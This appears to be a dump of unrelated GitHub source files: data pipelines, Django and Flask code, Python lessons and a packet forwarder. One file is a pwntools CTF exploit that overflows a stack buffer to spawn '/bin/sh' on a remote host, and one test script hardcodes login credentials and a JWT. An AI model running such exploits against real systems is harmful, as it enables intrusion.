specified sparsity\"\"\"\"\"\n if (self.high - self.low) / 2 == self.high: # If the range is symmetric around zero we can use Dale's law\n half_W0 = torch.rand(size=(self.n_neurons // 2, self.n_neurons), generator=self.rng)*(self.high - self.low) + self.low # Uniform distribution over [low, high]\n half_W0[torch.rand((self.n_neurons // 2, self.n_neurons), generator=self.rng) > (1-self.sparsity)*2] = 0 \n W0 = torch.concat((half_W0 * (half_W0 > 0), half_W0 * (half_W0 < 0)), 0) # Dale's law\n W0[torch.eye(self.n_neurons, dtype=torch.bool)] = 0 # Set diagonal to zero\n else:\n W0 = torch.rand(size=(self.n_neurons, self.n_neurons), generator=self.rng)*(self.high - self.low) + self.low # Uniform distribution over [low, high]\n W0[torch.rand((self.n_neurons, self.n_neurons), generator=self.rng) > (1-self.sparsity)] = 0\n W0[torch.eye(self.n_neurons, dtype=torch.bool)] = 0 # Set diagonal to zero \n return W0\n ","repo_name":"bioAI-Oslo/Spikeometric","sub_path":"spikeometric/datasets/uniform_connectivity_generator.py","file_name":"uniform_connectivity_generator.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"72077893867","text":"print(\"hello world\")\nprint(11//3)\nprint(11%3)\n\n# hash to comment\n# atalho do teclado pro comment: ctrl + ;\n# e o undo do comment é o mesmo atalho\n\"\"\"pra passar instruções pra outres devs, usa três aspas duplas\"\"\"\n# só cuida que ainda vai ser executado, mas não vai pro front :thinking:\n\na = 2\nb = a + 1\nprint(a + b)\nprint(2 + 5)\n\n# case sensitive\ndefault_variable_fn_or_method_case = \"snake_case\"\ndefaultClassCase = \"camelCase\"\n\nprint(default_variable_fn_or_method_case)\nprint(defaultClassCase)\n\nif b // a >= 1:\n print(b)\nelse:\n print(a)\n\nsalario = 2200\naumento = 2.5\n\nPERCENT = 100\n\nsalario_final = salario + (salario * aumento / PERCENT)\nprint(salario_final)\n\nnome = \"Déborah\"\nsobrenome = \"Salves\"\n\n#concat\nprint(nome + \" \" + sobrenome)\nprint(nome, sobrenome)\n\n# Paga imposto?\nsalario = int(input(\"Digite seu salário: \"))\nimposto = True #capital pra BOOLEAN\n\nif salario > 1900 and salario < 2800:\n valor_imposto = salario * (7/100)\n # print(\"Você deve pagar um imposto? {imposto}. O valor do imposto é de {valor_imposto}\")\nelif salario >= 2800 and salario < 3700:\n valor_imposto = salario * (15/100)\nelif salario >= 3700 and salario < 4600:\n valor_imposto = salario * (15/100)\nelif salario >= 4600:\n valor_imposto = salario * (15/100)\nelse:\n imposto = False\n valor_imposto = 0\n\nprint(f\"Você deve pagar um imposto? {imposto}. O valor do imposto é de {valor_imposto}\")\n\n# Média de alune pra ver se foi aprovade\n\nnota1 = 7\nnota2 = 6\nnota3 = 8\nnotas = [nota1, nota2, nota3]\n\nmedia = (nota1 + nota2 + nota3) / 3\nif media >= 7:\n aprovacao = True\nelse:\n aprovacao = False\n\nprint(f\"E alune foi {'aprovado' if aprovacao else 'reprovado'}\")\n\nmedia2 = 0\ncounter = 0\nfor nota in notas:\n media2 += nota\n print(f\"media2: {media2}\")\n counter += 1\n print(f\"counter: {counter}\")\n\nmedia2 = media2/counter\nprint(f\"media2: {media2}\")\n\naprovacao2 = True if media2 >= 7 else False\n\nprint(f\"Você foi {'aprovado' if aprovacao2 else 'reprovado'}\")\n\n\n","repo_name":"deborahsalves/intro-to-python","sub_path":"aula1.py","file_name":"aula1.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22981623081","text":"from airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport os\nimport boto3\nfrom airflow.hooks.base_hook import BaseHook\nfrom io import StringIO\n\naws_conn = BaseHook.get_connection('aws_default')\ns3 = boto3.client('s3', aws_access_key_id=aws_conn.login, aws_secret_access_key=aws_conn.password)\n\nbucket = \"hexaware-inbound-bucket\"\n\n#Define default_args dictionary to pass to the DAG\ndefault_args = {\n 'owner': 'me',\n 'start_date': datetime(2023, 1, 24),\n 'depends_on_past': False,\n 'retries': 0,\n 'schedule_interval': '@daily',\n}\n\n# def s3_connect(**kwargs):\n# # Connect to AWS using the default connection\n# aws_conn = BaseHook.get_connection('aws_default')\n# # s3 = boto3.client('s3', aws_access_key_id=aws_conn.login, aws_secret_access_key=aws_conn.password)\n\n#Instantiate a DAG\ndag = DAG(\n 'data_conversion', default_args=default_args)\n\ndef sort_data(**kwargs):\n \n #Reading the csv file as a Pandas DataFrame. The file can be an excel sheet. Other libraries exist for different filetypes like pdf,docx,txt\n \n read_file = s3.get_object(Bucket=bucket, Key='unprocessed/People_data.csv')\n original_data = pd.read_csv(read_file['Body'])\n #original_data=pd.read_csv('/usr/local/airflow/dags/People_data.csv')\n key=\"Birth Date\"\n #Checking datatype of key here. If string convert to datetime object for sorting\n# s3_connect()\n if type(original_data.iloc[0][key])==str:\n working_data=original_data.copy()\n working_data[key]=pd.to_datetime(working_data[key])\n sorted_data=working_data.sort_values(by=key)\n print (\"This is sorted data\", sorted_data)\n \n sorted_data.to_csv('sorted_data.csv',index=False)\n csv_buffer = StringIO()\n sorted_data.to_csv(csv_buffer)\n\n response = s3.put_object(\n Body=csv_buffer.getvalue(),\n Bucket=bucket,\n Key='processed/converted.csv',\n)\n print (\"done writing data to sorted_data.csv\")\n \n # Define the task using PythonOperator\nread_and_write_task = PythonOperator(\n task_id='sort_csv',\n python_callable=sort_data,\n dag=dag)\n\n# Define the DAG structure\nread_and_write_task\n\n","repo_name":"vivekreddybokka/astro","sub_path":"sort_dag.py","file_name":"sort_dag.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33820491348","text":"import pandas as pd\nimport numpy as np\nimport os\nimport threading as td\nfrom queue import Queue\nimport multiprocessing as mp\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nimport torch\nimport torch.utils.data as Data\nimport xlsxwriter\nimport time\nfrom sklearn.preprocessing import OneHotEncoder\nCOLSIZ = 10\ntformat = lambda s: str(s).title().ljust(COLSIZ)\n\ndef spart_and_one_hot_enc(url=None,store_url=None,fname=None):\n \"\"\"\n func: separate data to Attack And Normal\n :param url: dataset file dir\n :return:None\n \"\"\"\n data1 = pd.read_pickle(url,compression='zip')\n one_hot_enc = OneHotEncoder(categories=[range(16), range(16), range(16)])\n\n data = data1.values.astype(np.float64)\n print('{} has data shaped:{}'.format(fname, data.shape))\n rows = data.shape[0]\n start = 0\n row = int(rows // 64)\n end = row*64\n source_flags = data[start:end,-1].tolist()\n a_count = 0\n n_count = 0\n atta_url = os.path.join(store_url,'{}_pure_attack.csv'.format(fname))\n norl_url = os.path.join(store_url,'{}_pure_normal.csv'.format(fname))\n print('{}'.format(' '.join(map(tformat, ('attack', 'row', 'a_count', 'n_count')))))\n\n for r in range(row):\n num = 0\n if r % 2000 == 0:\n print('{}'.format(' '.join(map(tformat,(fname,row,a_count,n_count)))))\n if 1. in source_flags[r*64:r*64+64]:# or 1 in source_flags[r*64:r*64+64]:\n num = 1\n dat = one_hot_enc.fit_transform(data[r * 64:r * 64 + 64, 1:4]).toarray()\n label = pd.DataFrame(source_flags[r * 64:r * 64 + 64])\n\n if num:\n # attack data\n # test point\n atta = pd.DataFrame(dat)\n\n atta = pd.concat((atta,label),axis=1)\n atta.to_csv(atta_url,sep=',',header=False,index=False,columns=None,mode='a',index_label=None,encoding='utf-8')\n a_count += 1\n else:\n # Normal data\n nor = pd.DataFrame(dat)\n\n nor = pd.concat((nor,label),axis=1)\n nor.to_csv(norl_url,sep=',',header=False,index=False,columns=None,mode='a',index_label=None,encoding='utf-8')\n n_count += 1\n\n print('{},from {} to {} acquires {} blocks,labels lengh attack|normal :{}|{},done!!!\\n'.\n format(fname, start,end,row,a_count,n_count))\n return row, a_count,n_count\n\n\nif __name__ == '__main__':\n print('start at:{}'.format(time.asctime(time.localtime(time.time()))))\n test_addr = '/home/yyd/dataset/hacking/ignore_ID_diff_time'\n res_addr = '/home/yyd/dataset/hacking/one-hot-repeat-lab'\n for i in os.listdir(test_addr):\n fname = i.split('_')[0]\n store_url = os.path.join(res_addr, fname)\n if not os.path.exists(store_url):\n os.makedirs(store_url)\n row, a_count,n_count = spart_and_one_hot_enc(os.path.join(test_addr,i),store_url,fname)\n # break\n\n for ii in os.listdir(store_url):\n if 'csv' in ii:\n pass\n else:\n continue\n ii = os.path.join(store_url,ii)\n j = os.path.splitext(ii)[0]+'.pkl'\n pd.read_csv(ii,sep=None,delimiter=',',dtype=np.float64,header=None,engine='python',encoding='utf-8').\\\n to_pickle(j,compression='zip')\n print('\\n')\n # break\n print('end at:{}'.format(time.asctime(time.localtime(time.time()))))\n","repo_name":"TerYang/repeat_lab","sub_path":"seperate_data.py","file_name":"seperate_data.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72670353066","text":"from pwn import *\nimport sys\nif len(sys.argv) < 2:\n\tdebug = True\nelse:\n\tdebug = False\n\nif debug:\n\tp = process(\"./pinkiegift\")\nelse:\n\tp = remote(\"95.179.163.167\",10006)\n\ncontext.log_level = \"debug\"\np.recvuntil(\"Santa: \")\n#gdb.attach(p,\"b *0x080485DE\\nb *0x08048607\")\ninfo = p.recvuntil(\"\\n\",drop=True)\nbinsh = int(info.split(\" \")[0],16)\nsystem_addr = int(info.split(\" \")[1],16)\ngets_addr = 0x080483D0\npayload = \"a\"*(0x84 + 4) + p32(gets_addr) + p32(system_addr) + p32(binsh) + p32(binsh)\np.sendline(\"b\")\np.sendlineafter(\"b\",payload)\np.sendline(\"/bin/sh\\x00\")\np.interactive()\n","repo_name":"davidwu1999/Pwn","sub_path":"pwn_study/problem/stack_overflow/pinkiegift/pinkiegift.py","file_name":"pinkiegift.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2562497510","text":"import requests\nimport json\nimport os\n\n\nAUTH_ENDPOINT = \"http://127.0.0.1:8000/api/auth/\"\nREFRESH_ENDPOINT = \"http://127.0.0.1:8000/api/auth/jwt/refresh/\"\n\nimage_path = os.path.join(os.getcwd(), \"logo.png\")\n\nheaders = {\n \"Content-Type\": \"application/json\",\n}\ndata = {\n \"username\": \"devendra\",\n \"password\": \"nokialumia\",\n}\nr = requests.post(\n AUTH_ENDPOINT,\n data=json.dumps(data),\n headers=headers\n)\ntoken = r.json()['token']\nprint(token)\n\nB_ENDPOINT = \"http://127.0.0.1:8000/api/status/\"\nENDPOINT = B_ENDPOINT + \"23/\"\n\nheaders2 = {\n # \"Content-Type\": \"application/json\",\n \"Authorization\": \"JWT \" + token\n}\ndata2 = {\n \"content\": \"This is new content\"\n}\n\nwith open(image_path, 'rb') as image:\n file_data = {\n 'image': image\n }\n r = requests.get(\n ENDPOINT,\n # data=data2,\n headers=headers2,\n # files=file_data,\n )\n # r = requests.post(\n # B_ENDPOINT,\n # data=data2,\n # headers=headers2,\n # files=file_data,\n # )\n print(r.text)\n\n\n# AUTH_ENDPOINT = \"http://127.0.0.1:8000/api/auth/register/\"\n# REFRESH_ENDPOINT = \"http://127.0.0.1:8000/api/auth/jwt/refresh/\"\n# ENDPOINT = \"http://127.0.0.1:8000/api/status/\"\n\n# image_path = os.path.join(os.getcwd(), \"logo.png\")\n\n# headers = {\n# \"Content-Type\": \"application/json\",\n# \"Authorization\": \"JWT \" + 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxNCwidXNlcm5hbWUiOiJhYmMxMSIsImV4cCI6MTU4Nzk4ODAzNCwiZW1haWwiOiJhYmMxMUBzbWlsZWJvdHMuY29tIiwib3JpZ19pYXQiOjE1ODc5ODc3MzR9.1iPHVYwme1fpAN3DEnTBmObKXl7iLscmpvSlExipBzM',\n# }\n# data = {\n# \"username\": \"abc11\",\n# \"email\": \"abc11@smilebots.com\",\n# \"password\": \"nokialumia\",\n# 'password2': 'nokialumia',\n# }\n# r = requests.post(\n# AUTH_ENDPOINT,\n# data=json.dumps(data),\n# headers=headers\n# )\n# token = r.json() # ['token']\n# print(token)\n\n# headers = {\n# # \"Content-Type\": \"application/json\",\n# \"Authorization\": \"JWT \"+token,\n# }\n# with open(image_path, 'rb') as image:\n# file_data = {\n# 'image': image\n# }\n# data = {\n# 'content': 'Some random content'\n# }\n# json_data = json.dumps(data)\n# posted_response = requests.put(\n# ENDPOINT + str(32) + \"/\", data=data, headers=headers, files=file_data)\n# print(posted_response.text)\n\n\n# headers = {\n# # \"Content-Type\": \"application/json\",\n# \"Authorization\": \"JWT \"+token,\n# }\n\n# data = {\n# 'content': 'New content'\n# }\n# json_data = json.dumps(data)\n# posted_response = requests.put(\n# ENDPOINT + str(32) + \"/\", data=data, headers=headers)\n# print(posted_response.text)\n\n# refresh_data = {\n# 'token': token\n# }\n\n# new_response = requests.post(\n# REFRESH_ENDPOINT,\n# data=json.dumps(refresh_data),\n# headers=headers\n# )\n# new_token = new_response.json()\n# print(new_token)\n\n# get_endpoint = ENDPOINT + str(12)\n# post_data = json.dumps({'content': 'Some random content'})\n\n# r = requests.get(get_endpoint)\n# print(r.text)\n\n# r2 = requests.get(ENDPOINT)\n# print(r2.status_code)\n\n# post_headers = {\n# 'content-type': 'application/json'\n# }\n\n# post_response = requests.post(ENDPOINT, data=post_data, headers=post_headers)\n# print(post_response.text)\n\n\n# def do_img(method='get', data={}, is_json=True, img_path=None):\n# headers = {}\n# if is_json:\n# headers['content/type'] = 'application/json'\n# data = json.dumps(data)\n# if img_path is not None:\n# with open(image_path, 'rb') as image:\n# file_data = {\n# 'image': image\n# }\n# r = requests.request(method, ENDPOINT, data=data,\n# files=file_data, headers=headers)\n# else:\n# r = requests.request(method, ENDPOINT, data=data, headers=headers)\n# print(r.text)\n# print(r.status_code)\n# return r\n\n\n# do_img(method='post',\n# data={\"user\": 1, \"content\": \"\"},\n# is_json=False,\n# img_path=image_path)\n\n\n# def do(method='get', data={}, is_json=True):\n# headers = {}\n# if is_json:\n# headers['content/type'] = 'application/json'\n# data = json.dumps(data)\n# r = requests.request(method, ENDPOINT, data=data, headers=headers)\n# print(r.text)\n# print(r.status_code)\n# return r\n\n\n'''\nCreate\nRetrieve/List\nUpdate\nDelete\n'''\n\n# do(data={'id': 500})\n\n# do(method='delete', data={'id': 13})\n\n# do(method='put', data={\n# 'id': 13, 'content': 'some cool new content', 'user': 1})\n\n# do(method='post', data={'content': 'some cool new content', 'user': 1})\n","repo_name":"devendew/django-api-tutorial","sub_path":"scripts/script_rest_framework.py","file_name":"script_rest_framework.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5219636466","text":"# -*- coding utf-8 -*-\n# @Time : 2021/8/2 16:37\n# @Author : donghao\n# @File : aio_test.py\n# @Desc : 测试 aiofiles 和普通 file 操作速度,只操作多个文件条件下,耗时:file < aiofiles\nimport asyncio\nimport aiofiles\nimport time\n\n\ndef write_files(index):\n with open(\"./history/test_{}.txt\".format(index), mode='r') as file:\n for _ in range(1000):\n # file.write(str(index) * 1000 + \"\\n\")\n file.read()\n\n\ndef write_many():\n start1 = time.time()\n for i in range(1, 10):\n write_files(i)\n time.sleep(5)\n print(\"同步耗时:\" + str(time.time() - start1))\n\n\nasync def async_write(index):\n async with aiofiles.open(\"./history/async_test_{}.txt\".format(index), mode='r') as file:\n for _ in range(1000):\n # await file.write(str(index) * 1000 + \"\\n\")\n await file.read()\n\nasync def async_write_many():\n start2 = time.time()\n for i in range(1, 10):\n asyncio.create_task(async_write(i))\n while len(asyncio.all_tasks()) > 1:\n await asyncio.sleep(5)\n print(\"异步耗时:\" + str(time.time() - start2))\n\n\nif __name__ == '__main__':\n write_many()\n asyncio.run(async_write_many())\n\n\n","repo_name":"dearloveeee/Sink","sub_path":"history/aio_test/test_aiofiles.py","file_name":"test_aiofiles.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29768829484","text":"\"\"\"\nmember application생성\n settings.AUTH_USER_MODEL모델 구현\n username, nickname\n이후 해당 settings.AUTH_USER_MODEL모델을 Post나 Comment에서 author나 user항목으로 참조\n\"\"\"\nimport re\nfrom django.conf import settings\nfrom django.db import models\nfrom django.urls import reverse\n\n\nclass Post(models.Model):\n # Django가 제공하는 기본 settings.AUTH_USER_MODEL와 연결되도록 수정\n author = models.ForeignKey(settings.AUTH_USER_MODEL)\n photo = models.ImageField(upload_to='post', blank=True)\n created_date = models.DateTimeField(auto_now_add=True)\n modified_date = models.DateTimeField(auto_now=True)\n my_comment = models.OneToOneField(\n 'Comment',\n blank=True,\n null=True,\n related_name='+'\n )\n like_users = models.ManyToManyField(\n settings.AUTH_USER_MODEL,\n related_name='like_posts',\n through='PostLike',\n )\n\n class Meta:\n ordering = ['-pk', ]\n\n def add_comment(self, user, content):\n # 자신을 post로 갖고, 전달받은 user를 author로 가지며\n # content를 content필드내용으로 넣는 Comment객체 생성\n return self.comment_set.create(author=user, content=content)\n\n # def add_tag(self,tag_name):\n # tag,tag_created = Tag.objects.get_or_create(name=tag_name)\n # if not self.tags.filter(id=tag.id).exists():\n # self.tags.add(tag)\n @property\n def like_count(self):\n # 자신을 like하고 있는 user수 리턴\n return self.like_users.count()\n\n\nclass PostLike(models.Model):\n post = models.ForeignKey(Post)\n user = models.ForeignKey(settings.AUTH_USER_MODEL)\n created_date = models.DateTimeField(auto_now_add=True)\n\n\nclass Comment(models.Model):\n post = models.ForeignKey(Post)\n author = models.ForeignKey(settings.AUTH_USER_MODEL)\n content = models.TextField()\n html_content = models.TextField(blank=True)\n tags = models.ManyToManyField('Tag')\n created_date = models.DateTimeField(auto_now_add=True)\n modified_date = models.DateTimeField(auto_now=True)\n like_users = models.ManyToManyField(\n settings.AUTH_USER_MODEL,\n through='CommentLike',\n related_name='like_comments',\n )\n\n def save(self, *args, **kwargs):\n self.make_html_content_and_add_tags()\n super().save(*args, **kwargs)\n\n def make_html_content_and_add_tags(self):\n # 해시태그에 해당하는 정규표현식\n p = re.compile(r'(#\\w+)')\n # findall메서드로 해시태그 문자열들을 가져옴\n tag_name_list = re.findall(p, self.content)\n # 기존 content(Comment내용)을 변수에 할당\n ori_content = self.content\n # 문자열들을 순회하며\n for tag_name in tag_name_list:\n # Tag객체를 가져오거나 생성, 생성여부는 쓰지않는 변수이므로 _처리\n tag, _ = Tag.objects.get_or_create(name=tag_name.replace('#', ''))\n # 기존 content의 내용을 변경\n change_tag = '{tag_name}'.format(\n # url=reverse('post:hashtag_post_list', args=[tag_name.replace('#', '')]),\n url=reverse('post:hashtag_post_list', kwargs={'tag_name': tag_name.replace('#', '')}),\n tag_name=tag_name\n )\n ori_content = re.sub(r'{}(?![<\\w])'.format(tag_name), change_tag, ori_content, count=1)\n # content에 포함된 Tag목록을 자신의 tags필드에 추가\n if not self.tags.filter(pk=tag.pk).exists():\n self.tags.add(tag)\n # 편집이 완료된 문자열을 html_content에 저장\n self.html_content = ori_content\n super().save(update_fields=['html_content'])\n\n\nclass CommentLike(models.Model):\n comment = models.ForeignKey(Comment)\n user = models.ForeignKey(settings.AUTH_USER_MODEL)\n created_date = models.DateTimeField(auto_now_add=True)\n\n\nclass Tag(models.Model):\n name = models.CharField(max_length=50)\n\n def __str__(self):\n return 'Tag({})'.format(self.name)","repo_name":"junhokwon/instagram","sub_path":"django_app/post/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14598047249","text":"from simpleutil.config import cfg\nfrom simpleutil.utils import importutils\n\nfrom simpleservice.wsgi import router\nfrom simpleservice.wsgi.middleware import controller_return_response\n\nfrom fluttercomic import common\n\nfrom fluttercomic.plugin.platforms.base import PlatformsRequestPublic\n\nCONF = cfg.CONF\n\n\nclass Routers(router.RoutersBase):\n\n resource_name = 'fluttercomic_platform'\n\n def append_routers(self, mapper, routers=None):\n\n conf = CONF[common.NAME]\n\n controller = controller_return_response(PlatformsRequestPublic(), {})\n\n self._add_resource(mapper, controller,\n path='/%s/platforms' % common.NAME,\n get_action='platforms')\n\n\n for platform in conf.platforms:\n mod = 'fluttercomic.plugin.platforms.%s.controller' % platform.lower()\n module = importutils.import_module(mod)\n cls = getattr(module, '%sRequest' % platform.capitalize())\n ctrl_instance = cls()\n controller = controller_return_response(cls(), module.FAULT_MAP)\n\n self._add_resource(mapper, controller,\n path='/%s/orders/platforms/%s' % (common.NAME, platform.lower()),\n get_action='html')\n\n self._add_resource(mapper, controller,\n path='/%s/orders/platforms/%s' % (common.NAME, platform.lower()),\n post_action='new')\n\n self._add_resource(mapper, controller,\n path='/%s/orders/platforms/%s/{oid}' % (common.NAME, platform.lower()),\n post_action='notify')\n\n self._add_resource(mapper, controller,\n path='/%s/orders/platforms/%s/{oid}' % (common.NAME, platform.lower()),\n get_action='esure')\n\n self._add_resource(mapper, controller,\n path='/%s/orders/platforms/%s/{oid}' % (common.NAME, platform.lower()),\n get_action='result')\n\n ctrl_instance.extrouters(self, mapper, controller)\n\n # self._add_resource(mapper, controller,\n # path='/%s/orders/gifts/%s' % (common.NAME, platform.lower()),\n # post_action='gift')\n","repo_name":"lolizeppelin/fluttercomic","sub_path":"fluttercomic/plugin/platforms/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"44811161374","text":"def twoSum(numbers,target):\n l=0\n r=len(numbers)-1\n while ltarget:\n r-=1\n elif cursumtarget and r>1:\n numbers.pop()\n r-=1\n D={}\n print(r)\n for i in range(0,r+1):\n \n diff=target-numbers[i]\n \n if diff in D:\n if D[diff]!=i:\n return [D[diff]+1,i+1]\n D[numbers[i]]=i\nprint(twoSum([1,2,3,4,5,7,9,11],9))\nprint(twoSum1([1,2,3,4,5,7,9,11],9))\n\n","repo_name":"ChiragSinghai/450-Questions","sub_path":"Chirag/Leetcode_problem/167. Two Sum II - Input array is sorted.py","file_name":"167. Two Sum II - Input array is sorted.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44478130795","text":"# !/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n# @author: condi\n# @file: websocket_client.py\n# @time: 19-7-22 下午3:57\n\n\nfrom websocket import create_connection\n\n\n# 通过socket路由访问\nws = create_connection(\"ws://192.168.2.179:5022/api/v1/hello\")\nws.send(\"Hello, linyk3\")\n# ws.send(\"run_crawl\")\nresult = ws.recv()\nprint(result)\n# ws.close()\n\n\n","repo_name":"condilin/BMS","sub_path":"services/CZWCrawl/websocket_client.py","file_name":"websocket_client.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24028331335","text":"#!/usr/bin/env python\n\nimport struct\nimport sys,os\nimport socket\nimport binascii\n\nrawSocket=socket.socket(socket.PF_PACKET,socket.SOCK_RAW,socket.htons(0x0800))\n\nwhile True:\n\treceivedPacket=rawSocket.recv(2048)\n\n\t#Extrai o cabecalho Ethernet\n\t#ethernetHeader=receivedPacket[0:s\",ethernetHeader)\n\t#destinationMAC= binascii.hexlify(ethrheader[0])\n\t#sourceMAC= binascii.hexlify(ethrheader[1])\n\t#protocol= binascii.hexlify(ethrheader[2])\n\n\t#Extrai o cabecalho IP \n\tipHeader=receivedPacket[14:34]\n\tipHdr=struct.unpack(\"!12s4s4s\",ipHeader)\n\tdestinationIP=socket.inet_ntoa(ipHdr[2])\n\tsourceIP=socket.inet_ntoa(ipHdr[1])\n\tif sourceIP == \"10.10.10.10\": # Filtrar os pacotes que serao enviados\n\t\t# Printa na tela informacoes do pacote recebido\n\t\t# print \"Source IP: \" +sourceIP\n\t\t# print \"Destination IP: \"+destinationIP\n\t\t# print \"Destination MAC: \"+destinationMAC\n\t\t# print \"Source MAC: \"+sourceMAC\n\t\t# print \"Protocol: \"+protocol\n\t\t\n\t\t#Envia o pacote recebido de volta para a interface escolhida\n\t\ts = socket.socket(socket.PF_PACKET,socket.SOCK_RAW,socket.htons(0x0800))\n\t\ts.bind((\"eth2\", socket.htons(0x0800))) # Alterar para a interface que SFF recebera os pacotes\n\t\ts.send(receivedPacket)\n\t\t\n#################################################################################","repo_name":"nerds-ufes/sfc-dpdk","sub_path":"test/forward2.py","file_name":"forward2.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7878235765","text":"from os import path\nfrom xml.dom import NOT_FOUND_ERR\nfrom repository import sim\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np \n\n'''\nexport LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/lucas/.mujoco/mujoco210/bin\nexport LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib/nvidia\nexport LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libGLEW.so\n'''\n\nROOT_PATH = f\"{path.dirname(path.realpath(__file__))}\"\nsys.path.append(path.dirname(ROOT_PATH + '/repository'))\n\nMODEL_PATH = f\"{ROOT_PATH}/model/\"\n\ndef plot(x_serie, y_serie, c_map = 'viridis', title = 'title', x_label = 'x', y_label = 'y') -> None:\n '''Configurando e plotando o grafico'''\n\n cmap = mpl.colormaps[c_map] \n plt.set_cmap(cmap)\n\n plt.plot(x_serie, y_serie)\n\n plt.title(title)\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n\n plt.show()\n\n\nclass controller():\n B = None\n A = None\n\n\n def __init__(self, output,input, nbd=1, nad=2) -> None:\n self.output = output\n self.input = input\n\n self.npts = len(self.output)\n self.nbd = nbd\n self.nad = nad\n\n def ols(self):\n Y = []\n phi = []\n\n for j in range(max(self.nad,self.nbd)+1, self.npts-1):\n phirow = []\n\n for i in range(self.nad):\n phirow.append(-self.output[j-i-1])\n\n for i in range(self.nbd+1):\n phirow.append(self.input[j-i-1])\n\n Y.append([self.output[j]])\n phi.append(phirow)\n\n Y = np.array(Y)\n phi = np.array(phi)\n theta, _, _, _ = np.linalg.lstsq(phi, Y, rcond=None)\n\n theta = theta.flatten()\n\n self.B = theta[self.nad:]\n self.A = np.concatenate(([1], theta[:self.nad]))\n\n # return self.B, self.A\nif __name__ == '__main__':\n\n simulation = sim.sim(MODEL_PATH,'furuta','motor_vertical','motor_vertical','haste_horizontal')\n\n steps, outputs, inputs = simulation.run(step_limit=20000, render=False) \n\n ctrl = controller(outputs, inputs)\n\n ctrl.ols()\n print('B/A model')\n print(f'B: {ctrl.B}', f'A: {ctrl.A}')\n\n plot(steps,outputs, x_label='Passos', y_label='Angulo vertical')\n plot(steps,inputs, x_label='Passos', y_label='Torque')\n\n\n\n\n","repo_name":"lukasfreitas/bkp_ic_2022","sub_path":"furuta.py","file_name":"furuta.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3630507781","text":"# coding:utf-8\nfrom flask import render_template, redirect, flash, url_for\nfrom . import admin\nfrom flask.ext.login import login_required\nfrom ..models import ArticleType, Source, article_types, Article\nfrom .forms import SubmitArticlesForm\nfrom .. import db\n\n\n@admin.route('/submit-articles', methods=['GET', 'POST'])\n@login_required\ndef submitArticles():\n form = SubmitArticlesForm()\n\n sources = [(s.id, s.name) for s in Source.query.all()]\n form.source.choices = sources\n types = [(t.id, t.name) for t in ArticleType.query.all()]\n form.types.choices = types\n\n if form.validate_on_submit():\n title = form.title.data\n source_id = form.source.data\n content = form.content.data\n type_id = form.types.data\n summary = form.summary.data\n\n source = Source.query.get(source_id)\n articleType = ArticleType.query.get(type_id)\n\n if source and articleType:\n article = Article(title=title, content=content, summary=summary,\n source=source, articleType=articleType)\n db.session.add(article)\n db.session.commit()\n flash(u'发表文章成功', 'success')\n article_id = Article.query.filter_by(title=title).first().id\n return redirect(url_for('main.articleDetails', ArticleType=ArticleType,\n article_types=article_types, id=article_id))\n if form.errors:\n flash(u'发表文章失败', 'danger')\n\n return render_template('admin/submit_articles.html', ArticleType=ArticleType,\n article_types=article_types, form=form)","repo_name":"zhushengwei/MyBlogs-one","sub_path":"app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17907112424","text":"from math import sqrt\n# import sys\n# sys.stdin = open('input.txt', 'r')\n# sys.stdout = open('output.txt', 'w')\n\nt = int(input())\nfor _ in range(t):\n k = int(input())\n s = int(sqrt(k))\n r = s * s\n e = k - r\n if e == 0:\n print(s, 1)\n elif e <= s:\n print(e, s + 1)\n else:\n print(s + 1, 2 * s + 2 - e)","repo_name":"rifatblack/CodeForce","sub_path":"C. Infinity Table.py","file_name":"C. Infinity Table.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"14330431931","text":"import gtsam\nimport numpy as np\nfrom gtsam import symbol\nimport tqdm\n\nfrom DataDirectory import Data\nfrom utils import 